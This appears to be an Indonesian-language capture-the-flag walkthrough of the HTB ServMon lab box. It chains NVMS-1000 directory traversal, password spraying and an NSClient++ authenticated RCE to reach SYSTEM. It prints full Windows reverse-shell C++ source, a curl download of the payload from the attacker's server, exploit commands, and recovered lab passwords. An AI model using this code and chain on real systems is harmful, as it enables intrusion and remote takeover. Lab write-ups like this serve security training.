Information Gathering
Port Scanning
nmap -sC -sV 10.10.10.184 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 20:22 WIB
Nmap scan report for 10.10.10.184
Host is up (0.027s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| http-title: NSClient++
|_Requested resource was /index.html
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.94SVN%I=7%D=5/27%Time=6654891D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text
SF:/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\
SF:r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20
SF:text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo
SF::\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x
SF:20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml
SF:1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w
SF:3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x
SF:20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n
SF:\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\
SF:n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/
SF:html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20
SF:\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHT
SF:ML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD
SF:/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.or
SF:g/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x2
SF:0\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\
SF:x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r
SF:(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\
SF:r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\
SF:r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x2
SF:01\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtm
SF:l1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/199
SF:9/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20
SF:\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x
SF:20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=5/27%Time=66548925%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocat
SF:ion:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x
SF:03\x18\x8a\x06\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng
SF:th:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTT
SF:P/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found"
SF:)%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDo
SF:cument\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-L
SF:ength:\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-27T05:18:32
|_ start_date: N/A
|_clock-skew: -8h05m44s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.29 seconds
FTP Anonymous
ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:me): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49702|)
150 Opening ASCII mode data connection.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
#download all
wget -r ftp://anonymous:@10.10.10.184
Initial Access
pada fase ftp information gathering kita dapat login dengan anonymous user, didalam ftp tersebut terdapat sebuah file confidential.txt dari directory Users/Nadine
dari note tersebut menunjukan bahwa nadine meletakan Password.txt pada desktop nathan yang berarti potensi lokasinya adalah C:\users\nathan\desktop\password.txt
kita pindah ke web server. disini kita ditunjukan bahwa web server pada port 80 menjalankan NVMS-1000
yang dimana jika kita googling terkait kerentanannya, aplikasi ini rentan terhadap Directory Traversal
https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
mari kit download dan jalankan file nvms.py nya
wget https://github.com/AleDiBen/NVMS1000-Exploit/raw/master/nvms.py
python3 nvms.py 10.10.10.184 users/nathan/desktop/Passwords.txt password.txt
...
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
...
disini kita berhasil mendapatkan passwords.txt pada desktop nathan. selanjutnya kita akan melakukan password spray. untuk itu mari kita rapihkan wordlist terlebih dahulu
username yang ditemukan disimpan dalam file users
nathan
nadine
password yang ditemukan disimpan dalam file pass
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
apabila semuanya sudah siap, mari gunakan crackmapexec untuk melakukan password spraying pada smb
crackmapexec smb 10.10.10.184 -u users -p pass --shares
..
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
..
disini kita mendapatkan kredensial dari nadine, namun pada smb user tersebut hanya memiliki permission READ. tetapi kita mengetahui bahwa port 22 itu terbuka, mari kita coba login ke ssh
ssh [email protected]
kita berhasil masuk ke ssh dengan kredensial nadine:L1k3B1gBut7s@W0rk
Privilege Escalation
pada webserver port 8443 menjalankan aplikasi NSClient++ seperti yang dapat dilihat pada gambar dibawah ini
apabila kita googling, aplikasi ini rentan terhadap RCE dan secara langsung mendapatkan system akses
untuk melakukan rce kita memerlukan password, karena exploit ini bersifat authenticated. jadi kita bisa mencoba mencari konfigurasi nsclient melalui nadine user, kita bisa mereferensikan ke halaman berikut
https://www.exploit-db.com/exploits/46802
NSClient++ terinstall pada C:\program files\nsclient++ kita bisa masuk ke directory tersebut dan menjalankan perintah berikut
nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
disini kita berhasil mendapatkan passwordnya, tetapi ketika kita mencoba untuk login maka akan mendapatkan error seperti berikut
setelah memeriksa file configurasinya (nsclient.ini), masalah tersebut terjadi karena host yang telah diwhitelist atau hanya bisa mengakses melalui jaringan lokal
type nsclient.ini
...
allowed hosts = 127.0.0.1
...
untuk itu mari kita setup pivoting dengan sshpass
sshpass -p 'L1k3B1gBut7s@W0rk' ssh [email protected] -L 8443:127.0.0.1:8443
ss -tupln | grep 8443
selanjutnya mari kita akses https://127.0.0.1:8443 pada browser dan login dengan password yang telah ditemukan
disini kita telah berhasil login, karena kita sudah mendapatkan password dan berhasil masuk ke dashboard selanjutnya kita akan melakukan rce. berdasarkan pada referensi exploitdb tersebut kita harus melakukan beberapa step berikut ini
disini saya akan langsung melakukan reverse shell dengan executable dari c++, sebelum itu saya akan membuat dan melakukan transfer file rev.exe yang dibuat untuk reverse shell ke mesin melalui user nadine. untungnya pada server tersebut sudah tersedia curl sehingga memudahkan untuk melakukan transfer file
rev.cpp
/*
author: @cocomelonc
windows reverse shell without any encryption/encoding
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "w2_32")
WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in hax;
STARTUPINFO sui;
PROCESS_INFORMATION pi;
int main(int argc, char* argv[])
{
// listener ip, port on attacker's machine
char *ip = "127.0.0.1";
short port = 4444;
// init socket lib
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
hax.sin_family = AF_INET;
hax.sin_port = htons(port);
hax.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
WSAConnect(wSock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
memset(&sui, 0, sizeof(sui));
sui.cb = sizeof(sui);
sui.dwFlags = STARTF_USESTDHANDLES;
sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) wSock;
// start cmd.exe with redirected streams
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
exit(0);
}
ubah ip dan port, selanjutnya compile dengan perintah berikut
i686-w64-mingw32-g++ shell.cpp -o shell.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive >/dev/null 2>&1
kemudian jalankan webserver pada lokal
python3 -m http.server -b 10.10.14.28
download file dari webserver ke mesin
cd C:\
mkdir temp
cd temp
curl http://10.10.14.28:8000/rev.exe -o rev.exe
selanjutnya kita akan melakukan rce, kita bisa mengikuti step-by-step referensi dari exploitdb tersebut atau menggunakan automatic tools dari halaman berikut ini
https://www.exploit-db.com/exploits/48360
disini saya akan menggunakan automatic tools tersebut untuk mentrigger file yang telah saya transfer
wget https://www.exploit-db.com/raw/48360 -O exploit.py
python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\temp\rev.exe'
disini kita berhasil mendapatkan akses nt authority\system